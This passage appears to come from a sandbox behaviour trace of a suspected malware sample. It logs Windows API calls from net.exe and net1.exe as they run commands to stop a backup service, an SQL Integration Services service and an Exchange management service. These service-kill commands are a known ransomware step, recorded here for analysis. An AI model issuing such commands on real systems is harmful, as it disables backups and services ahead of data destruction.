_wcsicmp (_String1="files", _String2="mozyprobackup") returned -7 [0100.719] _wcsicmp (_String1="group", _String2="mozyprobackup") returned -6 [0100.719] _wcsicmp (_String1="groups", _String2="mozyprobackup") returned -6 [0100.719] _wcsicmp (_String1="help", _String2="mozyprobackup") returned -5 [0100.719] _wcsicmp (_String1="helpmsg", _String2="mozyprobackup") returned -5 [0100.719] _wcsicmp (_String1="localgroup", _String2="mozyprobackup") returned -1 [0100.719] _wcsicmp (_String1="pause", _String2="mozyprobackup") returned 3 [0100.719] _wcsicmp (_String1="session", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="sessions", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="sess", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="share", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="start", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="stats", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="statistics", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="stop", _String2="mozyprobackup") returned 6 [0100.719] _wcsicmp (_String1="time", _String2="mozyprobackup") returned 7 [0100.719] _wcsicmp (_String1="user", _String2="mozyprobackup") returned 8 [0100.719] _wcsicmp (_String1="users", _String2="mozyprobackup") returned 8 [0100.719] _wcsicmp (_String1="msg", _String2="mozyprobackup") returned 4 [0100.719] _wcsicmp (_String1="messenger", _String2="mozyprobackup") returned -10 [0100.719] _wcsicmp (_String1="receiver", _String2="mozyprobackup") returned 5 [0100.719] _wcsicmp (_String1="rcv", _String2="mozyprobackup") returned 5 [0100.719] _wcsicmp (_String1="netpopup", _String2="mozyprobackup") returned 1 [0100.719] _wcsicmp (_String1="redirector", _String2="mozyprobackup") returned 5 [0100.719] _wcsicmp (_String1="redir", _String2="mozyprobackup") returned 5 [0100.719] _wcsicmp (_String1="rdr", _String2="mozyprobackup") returned 5 [0100.719] _wcsicmp (_String1="workstation", _String2="mozyprobackup") returned 10 [0100.719] _wcsicmp (_String1="work", _String2="mozyprobackup") returned 10 [0100.719] _wcsicmp (_String1="wksta", _String2="mozyprobackup") returned 10 [0100.719] _wcsicmp (_String1="prdr", _String2="mozyprobackup") returned 3 [0100.719] _wcsicmp (_String1="devrdr", _String2="mozyprobackup") returned -9 [0100.719] _wcsicmp (_String1="lanmanworkstation", _String2="mozyprobackup") returned -1 [0100.720] _wcsicmp (_String1="server", _String2="mozyprobackup") returned 6 [0100.720] _wcsicmp (_String1="svr", _String2="mozyprobackup") returned 6 [0100.720] _wcsicmp (_String1="srv", _String2="mozyprobackup") returned 6 [0100.720] _wcsicmp (_String1="lanmanserver", _String2="mozyprobackup") returned -1 [0100.720] _wcsicmp (_String1="alerter", _String2="mozyprobackup") returned -12 [0100.720] _wcsicmp (_String1="netlogon", _String2="mozyprobackup") returned 1 [0100.720] _wcsupr (in: _String="mozyprobackup" | out: _String="MOZYPROBACKUP") returned="MOZYPROBACKUP" [0100.720] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1dce10 [0100.724] GetServiceKeyNameW (in: hSCManager=0x1dce10, lpDisplayName="MOZYPROBACKUP", lpServiceName=0xffe85750, lpcchBuffer=0x18f748 | out: lpServiceName="", lpcchBuffer=0x18f748) returned 0 [0100.725] _wcsicmp (_String1="msg", _String2="MOZYPROBACKUP") returned 4 [0100.725] _wcsicmp (_String1="messenger", _String2="MOZYPROBACKUP") returned -10 [0100.725] _wcsicmp (_String1="receiver", _String2="MOZYPROBACKUP") returned 5 [0100.725] _wcsicmp (_String1="rcv", _String2="MOZYPROBACKUP") returned 5 [0100.726] _wcsicmp (_String1="redirector", _String2="MOZYPROBACKUP") returned 5 [0100.726] _wcsicmp (_String1="redir", _String2="MOZYPROBACKUP") returned 5 [0100.726] _wcsicmp (_String1="rdr", _String2="MOZYPROBACKUP") returned 5 [0100.726] _wcsicmp (_String1="workstation", _String2="MOZYPROBACKUP") returned 10 [0100.726] _wcsicmp (_String1="work", _String2="MOZYPROBACKUP") returned 10 [0100.726] _wcsicmp (_String1="wksta", _String2="MOZYPROBACKUP") returned 10 [0100.726] _wcsicmp (_String1="prdr", _String2="MOZYPROBACKUP") returned 3 [0100.726] _wcsicmp (_String1="devrdr", _String2="MOZYPROBACKUP") returned -9 [0100.726] _wcsicmp (_String1="lanmanworkstation", _String2="MOZYPROBACKUP") returned -1 [0100.726] _wcsicmp (_String1="server", _String2="MOZYPROBACKUP") returned 6 [0100.726] _wcsicmp (_String1="svr", _String2="MOZYPROBACKUP") returned 6 [0100.726] _wcsicmp (_String1="srv", _String2="MOZYPROBACKUP") returned 6 [0100.726] _wcsicmp (_String1="lanmanserver", _String2="MOZYPROBACKUP") returned -1 [0100.726] _wcsicmp (_String1="alerter", _String2="MOZYPROBACKUP") returned -12 [0100.726] _wcsicmp (_String1="netlogon", _String2="MOZYPROBACKUP") returned 1 [0100.726] NetServiceControl (in: servername=0x0, service="MOZYPROBACKUP", opcode=0x0, arg=0x0, bufptr=0x18f750 | out: bufptr=0x18f750) returned 0x889 [0100.727] wcscpy_s (in: _Destination=0xffe880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.727] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0100.728] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.730] GetFileType (hFile=0xb) returned 0x2 [0100.730] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f618 | out: lpMode=0x18f618) returned 1 [0100.730] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f610, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x18f610*=0x1e) returned 1 [0100.730] GetFileType (hFile=0xb) returned 0x2 [0100.731] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f618 | out: lpMode=0x18f618) returned 1 [0100.731] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f610, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x18f610*=0x2) returned 1 [0100.731] _ultow (in: _Dest=0x889, _Radix=1635968 | out: _Dest=0x889) returned="2185" [0100.731] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.731] GetFileType (hFile=0xb) returned 0x2 [0100.732] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f618 | out: lpMode=0x18f618) returned 1 [0100.732] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f610, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x18f610*=0x34) returned 1 [0100.732] GetFileType (hFile=0xb) returned 0x2 [0100.732] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f618 | out: lpMode=0x18f618) returned 1 [0100.733] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f610, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x18f610*=0x2) returned 1 [0100.733] NetApiBufferFree (Buffer=0x1d4d50) returned 0x0 [0100.733] NetApiBufferFree (Buffer=0x1dc100) returned 0x0 [0100.733] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0100.733] exit (_Code=2) Process: id = "156" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x56218000" os_pid = "0x99c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "151" os_parent_pid = "0x12c4" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6763 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6764 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6765 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6766 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6767 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6768 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6769 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6770 start_va = 0xffe60000 end_va = 0xffe92fff entry_point = 0xffe60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6771 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6772 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6773 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6774 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6792 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6793 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6794 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6795 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6796 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6797 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6798 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 6799 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6800 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6801 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6802 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6803 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6804 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6805 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6806 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6807 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6808 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6809 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6810 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6811 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6812 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6813 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6814 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6815 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6816 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6817 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6818 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 584 os_tid = 0x12dc [0100.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefc90 | out: lpSystemTimeAsFileTime=0xefc90*(dwLowDateTime=0xf14017d0, dwHighDateTime=0x1d48689)) [0100.793] GetCurrentProcessId () returned 0x99c [0100.793] GetCurrentThreadId () returned 0x12dc [0100.793] GetTickCount () returned 0x22fa7 [0100.793] QueryPerformanceCounter (in: lpPerformanceCount=0xefc98 | out: lpPerformanceCount=0xefc98*=1814771100000) returned 1 [0100.795] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000 [0100.795] __set_app_type (_Type=0x1) [0100.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe79c9c) returned 0x0 [0100.795] __getmainargs (in: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788, _DoWildCard=0, _StartInfo=0xffe8479c | out: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788) returned 0 [0100.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.796] GetConsoleOutputCP () returned 0x1b5 [0100.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe8cec0 | out: lpCPInfo=0xffe8cec0) returned 1 [0100.796] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.798] sprintf_s (in: _DstBuf=0xefc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.799] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.800] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.800] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" [0100.800] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.800] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.801] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc28 | out: Buffer=0xefc28*=0x2b4d50) returned 0x0 [0100.801] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc28 | out: Buffer=0xefc28*=0x2bc100) returned 0x0 [0100.801] _fileno (_File=0x7fefdba2a80) returned 0 [0100.801] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.801] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.801] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.801] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.801] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.801] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.801] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.801] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.801] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.801] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.801] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.801] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.801] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.801] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.801] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.801] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.801] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.801] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.801] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.801] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.801] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.802] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.802] _wcsicmp (_String1="accounts", _String2="MsDtsServer110") returned -12 [0100.802] _wcsicmp (_String1="computer", _String2="MsDtsServer110") returned -10 [0100.802] _wcsicmp (_String1="config", _String2="MsDtsServer110") returned -10 [0100.802] _wcsicmp (_String1="continue", _String2="MsDtsServer110") returned -10 [0100.802] _wcsicmp (_String1="cont", _String2="MsDtsServer110") returned -10 [0100.802] _wcsicmp (_String1="file", _String2="MsDtsServer110") returned -7 [0100.802] _wcsicmp (_String1="files", _String2="MsDtsServer110") returned -7 [0100.802] _wcsicmp (_String1="group", _String2="MsDtsServer110") returned -6 [0100.802] _wcsicmp (_String1="groups", _String2="MsDtsServer110") returned -6 [0100.802] _wcsicmp (_String1="help", _String2="MsDtsServer110") returned -5 [0100.802] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer110") returned -5 [0100.802] _wcsicmp (_String1="localgroup", _String2="MsDtsServer110") returned -1 [0100.802] _wcsicmp (_String1="pause", _String2="MsDtsServer110") returned 3 [0100.802] _wcsicmp (_String1="session", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="sessions", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="sess", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="share", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="start", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="stats", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="statistics", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="stop", _String2="MsDtsServer110") returned 6 [0100.802] _wcsicmp (_String1="time", _String2="MsDtsServer110") returned 7 [0100.802] _wcsicmp (_String1="user", _String2="MsDtsServer110") returned 8 [0100.802] _wcsicmp (_String1="users", _String2="MsDtsServer110") returned 8 [0100.802] _wcsicmp (_String1="msg", _String2="MsDtsServer110") returned 3 [0100.802] _wcsicmp (_String1="messenger", _String2="MsDtsServer110") returned -14 [0100.802] _wcsicmp (_String1="receiver", _String2="MsDtsServer110") returned 5 [0100.802] _wcsicmp (_String1="rcv", _String2="MsDtsServer110") returned 5 [0100.802] _wcsicmp (_String1="netpopup", _String2="MsDtsServer110") returned 1 [0100.802] _wcsicmp (_String1="redirector", _String2="MsDtsServer110") returned 5 [0100.802] _wcsicmp (_String1="redir", _String2="MsDtsServer110") returned 5 [0100.802] _wcsicmp (_String1="rdr", _String2="MsDtsServer110") returned 5 [0100.802] _wcsicmp (_String1="workstation", _String2="MsDtsServer110") returned 10 [0100.802] _wcsicmp (_String1="work", _String2="MsDtsServer110") returned 10 [0100.803] _wcsicmp (_String1="wksta", _String2="MsDtsServer110") returned 10 [0100.803] _wcsicmp (_String1="prdr", _String2="MsDtsServer110") returned 3 [0100.803] _wcsicmp (_String1="devrdr", _String2="MsDtsServer110") returned -9 [0100.803] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer110") returned -1 [0100.803] _wcsicmp (_String1="server", _String2="MsDtsServer110") returned 6 [0100.803] _wcsicmp (_String1="svr", _String2="MsDtsServer110") returned 6 [0100.803] _wcsicmp (_String1="srv", _String2="MsDtsServer110") returned 6 [0100.803] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer110") returned -1 [0100.803] _wcsicmp (_String1="alerter", _String2="MsDtsServer110") returned -12 [0100.803] _wcsicmp (_String1="netlogon", _String2="MsDtsServer110") returned 1 [0100.803] _wcsupr (in: _String="MsDtsServer110" | out: _String="MSDTSSERVER110") returned="MSDTSSERVER110" [0100.803] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2bce10 [0100.881] GetServiceKeyNameW (in: hSCManager=0x2bce10, lpDisplayName="MSDTSSERVER110", lpServiceName=0xffe85750, lpcchBuffer=0xefb48 | out: lpServiceName="", lpcchBuffer=0xefb48) returned 0 [0100.882] _wcsicmp (_String1="msg", _String2="MSDTSSERVER110") returned 3 [0100.882] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER110") returned -14 [0100.882] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER110") returned 5 [0100.882] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER110") returned 5 [0100.882] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER110") returned 5 [0100.882] _wcsicmp (_String1="redir", _String2="MSDTSSERVER110") returned 5 [0100.882] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER110") returned 5 [0100.882] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER110") returned 10 [0100.882] _wcsicmp (_String1="work", _String2="MSDTSSERVER110") returned 10 [0100.882] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER110") returned 10 [0100.882] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER110") returned 3 [0100.882] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER110") returned -9 [0100.882] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER110") returned -1 [0100.882] _wcsicmp (_String1="server", _String2="MSDTSSERVER110") returned 6 [0100.882] _wcsicmp (_String1="svr", _String2="MSDTSSERVER110") returned 6 [0100.882] _wcsicmp (_String1="srv", _String2="MSDTSSERVER110") returned 6 [0100.882] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER110") returned -1 [0100.882] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER110") returned -12 [0100.882] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER110") returned 1 [0100.883] NetServiceControl (in: servername=0x0, service="MSDTSSERVER110", opcode=0x0, arg=0x0, bufptr=0xefb50 | out: bufptr=0xefb50) returned 0x889 [0100.883] wcscpy_s (in: _Destination=0xffe880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.883] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0100.884] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.886] GetFileType (hFile=0xb) returned 0x2 [0100.886] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa18 | out: lpMode=0xefa18) returned 1 [0100.886] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefa10, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0xefa10*=0x1e) returned 1 [0100.886] GetFileType (hFile=0xb) returned 0x2 [0100.886] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa18 | out: lpMode=0xefa18) returned 1 [0100.887] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa10, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0xefa10*=0x2) returned 1 [0100.887] _ultow (in: _Dest=0x889, _Radix=981632 | out: _Dest=0x889) returned="2185" [0100.887] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.887] GetFileType (hFile=0xb) returned 0x2 [0100.887] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa18 | out: lpMode=0xefa18) returned 1 [0100.888] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefa10, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0xefa10*=0x34) returned 1 [0100.888] GetFileType (hFile=0xb) returned 0x2 [0100.888] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa18 | out: lpMode=0xefa18) returned 1 [0100.888] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa10, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0xefa10*=0x2) returned 1 [0100.889] NetApiBufferFree (Buffer=0x2b4d50) returned 0x0 [0100.889] NetApiBufferFree (Buffer=0x2bc100) returned 0x0 [0100.889] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" [0100.889] exit (_Code=2) Process: id = "157" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x56689000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = 